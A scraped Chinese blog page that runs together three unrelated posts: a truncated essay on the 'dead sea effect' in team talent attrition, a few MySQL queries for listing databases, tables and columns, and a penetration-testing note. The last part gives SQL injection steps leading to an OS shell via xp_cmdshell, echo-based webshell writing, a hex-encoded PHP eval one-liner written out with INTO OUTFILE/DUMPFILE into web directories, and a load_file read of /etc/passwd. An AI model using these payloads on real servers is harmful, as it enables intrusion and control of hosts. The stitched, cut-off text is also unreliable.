很久没在这个博客更文了,最近关注到360周老板的一个微博,火了一个死海效应,当然非他原创,但将此效应推到一个高度。
什么是死海效应?在一个正常运作的团队中,整个人才系统应该是循环的。有新的成员加入,也有老的成员离开。只要市场上人才质量不发生剧烈的波动,团队内人才质量应该是平稳的。
但死海效应中不这样,好的人才不断流失,低质量人才被留存,这个团队素质越来越差。形成这种状况的原因其实挺简单:环境恶化,高质量人才有更强的实力,可以自由地选择满足自己期望的团队。而低质量人才没有更多选择空间,从而只能在当前的环境下继续生存。
死海效应导致的恶劣后果是显而易见的。
现代组织中人是生产第一要素。如果人才质量持续降低,那么整个团队会缺乏战斗力,商业上得不到发展,这个团队将面临瓦解的风险。什么样的团队容易滋生死海效应,我总结了几个点:无压、不透明、人情。
第一个点是无压,当一个公司的业务发展进入瓶颈期,战略上面没有远见,抑或是已经占据了市场中的有利地形,温饱不愁
标签:
mysql
mssql
oracle
模糊查询
|
分类:
数据仓库
|
PS:本来主打的想利用模糊查询大量表中某字段内容的结果,奈何MSSQL存储过程未测试成功,暂标记下
有两个帖子看着不错,待通用优化
http://blog.csdn.net/zhang399401/article/details/51735550
http://bbs.csdn.net/topics/300235445
http://www.jb51.net/article/34706.htm
找到几个频率高点的语句,摘抄记录下
0x01MySQL中查询所有数据库名和表名
查询所有数据库
show databases;
查询指定数据库中所有表名
select table_name from information_schema.tables where
table_schema='database_name' and table_type='base table';
查询指定表中的所有字段名
select column_name from information_schema.columns where
table_schema='database_name' and table_name='table_name';
查询指定表中的所有字段名和字段类型
select column_name,data_type from information_schema.columns where
table_schema='database_name' and table_name='table_name';
检索数据
(2016-04-11 17:04)
标签:
os-shell
sql注入
安全狗
绕过
渗透测试
|
分类:
渗透攻防
|
key:sa 、 os-shell 、 上传、回显
1.sqlinj
1.1 查看当前用户和当前库
1.2 查看用户相关的表,查找管理员帐号相关信息,加盐的密码,且盐加密
2.os-shell (当然可借用xp_cmd)
#找路径
dir c:\
dir d:\ #木有D盘,别放弃
dir E:\
#定位到路径
dir E:\sainuoNew\
3.getshell
#找到路径写shell,有两种方法,一种直接echo(要结合^);一种是sql语句备份的那种(MSSQL)
#echo 直接写入,只要权限够,就可以;遇到狗另说
echo ^<一句话shell,渣浪不支持这个文本^>
PS:用^<不能直接<,也不能用双引号
#sql语句,mysql与mssql 不同
mysql:注意要转成十六进制(密码a)
and 1=2 union select
0x3c3f70687020a6576616c28245f504f53545b615d293ba3f3e into outfile
'/alidata/www/cms/ttbdxt/conf.php'--= //注入语句
select 0x3c3f70687020a6576616c28245f504f53545b615d293ba3f3e into
DUMPFILE 'E:/XXX/php.php'; //利用dumpfileshell
#mysql sql-shell 查看文件内容
select load_file('/etc/pass
加载中…
转载▼